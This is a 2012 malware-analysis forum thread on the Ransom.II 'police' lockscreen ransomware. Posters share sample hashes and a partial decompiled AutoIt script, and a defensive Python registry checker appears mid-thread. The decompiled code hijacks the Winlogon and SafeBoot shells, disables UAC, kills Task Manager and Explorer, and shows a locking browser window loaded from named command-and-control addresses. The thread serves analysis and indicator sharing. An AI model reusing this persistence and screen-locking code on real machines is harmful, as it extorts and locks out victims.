AutoIt/LockScreen

Forum for analysis and discussion about malware.
thisisu
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am

AutoIt/LockScreen

Post by thisisu » Mon Jun 04, 2012 8:06 am

Celas
MD5: a7768f4973ad7cf8217212a4d12dbae0
https://www.virustotal.com/file/c8ea293 ... /analysis/


Kafeine
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Kafeine » Mon Jun 04, 2012 8:22 am

thisisu wrote:
    Celas

Here on botnets.fr:
https://www.botnets.fr/index.php/Ransom.II

thisisu
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am

Re: Trojan Ransom / FakePoliceAlert

Post by thisisu » Mon Jun 11, 2012 12:32 am

"Celas" - Ransom.II
MD5: 941d0697b844414be106b7a397d31fd6
https://www.virustotal.com/file/8801cce ... /analysis/

tachion
Posts: 32
Joined: Sat Dec 24, 2011 10:03 am

Re: Trojan Ransom / FakePoliceAlert

Post by tachion » Mon Jun 11, 2012 5:16 pm

Next Ransom II - Celas :)

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Tue Jun 12, 2012 1:41 pm

"Celas" - Ransom.II

6ff98578a6948960677ea1317b7f69db https://www.virustotal.com/file/2d99e84 ... /analysis/
6177f9bde1fd578165974ceddcade3d9 https://www.virustotal.com/file/1cfb58f ... /analysis/

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Trojan:AutoIt/LockScreen

Post by Win32:Virut » Sun Jul 08, 2012 7:52 pm

Ransom.II

MD5: F74E910C368717E9ACEF3A1B9A1A9F03

Screenshots: https://www.botnets.fr/index.php/Ransom.II

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Mon Jul 09, 2012 1:50 pm

Trojan:Win32/Ransom.II

MD5: 5D18E789AFED967531372ACCBB7152A2

Win32:Virut
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm

Re: Trojan Ransom / FakePoliceAlert

Post by Win32:Virut » Fri Aug 17, 2012 1:36 pm

Ransom.II

MD5: 82B192B07B32D0E77B1F2B21F17283E6

https://www.virustotal.com/file/edd206f ... /analysis/

thisisu
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am

Re: Trojan Ransom / FakePoliceAlert

Post by thisisu » Tue Nov 13, 2012 1:02 am

Win32:Virut wrote:
    Ransom.II
    MD5: F74E910C368717E9ACEF3A1B9A1A9F03
    Screenshots: https://www.botnets.fr/index.php/Ransom.II

Parts of the decompiled AutoIt script / highlights?

Code:

00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut3E.tmp

$UNDERGROUND = "brasilia"
$SWISS = "germany"

ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
If @OSVersion = "WIN_7" Or @OSVersion = "WIN_VISTA" Then
	If @OSArch = "X64" Then
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	Else
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	EndIf
EndIf
$ASHELL = RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell")
If $ASHELL <> @ScriptFullPath Then
	If @OSVersion <> "WIN_7" Or @OSVersion = "WIN_VISTA" Then
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	EndIf
	RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
	RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
	RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
	RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
$SHELL = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
If $SHELL <> @ScriptFullPath Then
	FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk")
EndIf
$OIE = ObjCreate("Shell.Explorer.2")
$HGUI = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $WS_POPUP + $WS_EX_TOOLWINDOW, $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW)
$GUIACTIVEX = GUICtrlCreateObj($OIE, 0, 0, @DesktopWidth, @DesktopHeight)
GUISetBkColor(1, $HGUI)
GUISetState()
$OIE.navigate($URL)
_WinAPI_SetLayeredWindowAttributes($HGUI, 1, 255, 3)
Local $TIMER, $DIFF
$TIMER = TimerInit()
While 1
	$DIFF = TimerDiff($TIMER)
	If $DIFF > 150 Then
		If ProcessExists("taskmgr.exe") Then
			ProcessClose("taskmgr.exe")
		EndIf
		If ProcessExists("explorer.exe") Then
			Run(@ComSpec & " /c " & "taskkill /f /im explorer.exe", "", @SW_HIDE)
		EndIf
		$DIFF = 0
		$TIMER = TimerInit()
	EndIf
	WinSetOnTop($HGUI, "", 1)
	WinActivate($HGUI)
WEnd
Full decompile in attachment.

You can add this IP: 95.163.104.88 to your page, Kafeine :)
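A defender-side check for the registry persistence the decompiled script above sets up, written as an added example that is not part of this thread or of the sample: it parses a Windows .reg export and reports the Winlogon Shell, SafeBoot AlternateShell, EnableLUA and context-menu policy values that depart from stock defaults. The baseline values, the sample export and the lock.exe path in it are constructed assumptions.

```python
import re

# Values the decompiled Ransom.II script rewrites, paired with what a stock Windows
# install carries (assumption: defaults; a hardened baseline may differ).
BASELINE = {
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell"): "explorer.exe",
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell"): "cmd.exe",
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA"): "1",
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu"): "0",
    (r"HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu"): "0",
}

def parse_reg(text):
    """Parse a .reg export into {(key, name): value}, lower-casing key and name
    because the registry is case-insensitive (the script itself mixes SOFTWARE/Software)."""
    values, key = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line) if key else None
        if m and m.group(2).startswith("dword:"):
            values[(key, m.group(1).lower())] = str(int(m.group(2)[6:], 16))
        elif m and m.group(2).startswith('"'):
            # REG_SZ: undo the .reg escaping of backslashes and quotes
            values[(key, m.group(1).lower())] = m.group(2)[1:-1].replace("\\\\", "\\").replace('\\"', '"')
    return values

def lockscreen_indicators(reg_text):
    """Return (key, name, observed) for each watched value that departs from baseline;
    absent values are not reported, only rewritten ones."""
    found = parse_reg(reg_text)
    hits = []
    for (key, name), expected in BASELINE.items():
        observed = found.get((key.lower(), name.lower()))
        if observed is not None and observed.strip().lower() != expected:
            hits.append((key, name, observed))
    return hits

# Constructed sample export: Shell hijacked and UAC disabled, SafeBoot shell untouched.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="C:\\Users\\victim\\AppData\\Local\\Temp\\lock.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
"AlternateShell"="cmd.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
'''
```

Run `lockscreen_indicators(SAMPLE_REG)` against a `reg export HKLM` dump of a suspect machine in place of the sample; a Shell value that is not explorer.exe is the strongest single indicator here, since the script writes it on every path.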

thisisu
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am

Re: Trojan Ransom / FakePoliceAlert

Post by thisisu » Tue Nov 13, 2012 1:35 am

Win32:Virut wrote:
    Ransom.II
    MD5: 82B192B07B32D0E77B1F2B21F17283E6
    https://www.virustotal.com/file/edd206f ... /analysis/

Lots of interesting code in this one IMO. I just picked a small amount so it doesn't lag the thread.

Code:

00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut7B.tmp

If FileExists(@AppDataDir & "1.exe") Then
	$HAFTBEFEHLAAT = "haftbefehlaat"
	$URL = "95.163.104.87/aff14/start.php"
Full decompile in attachment.
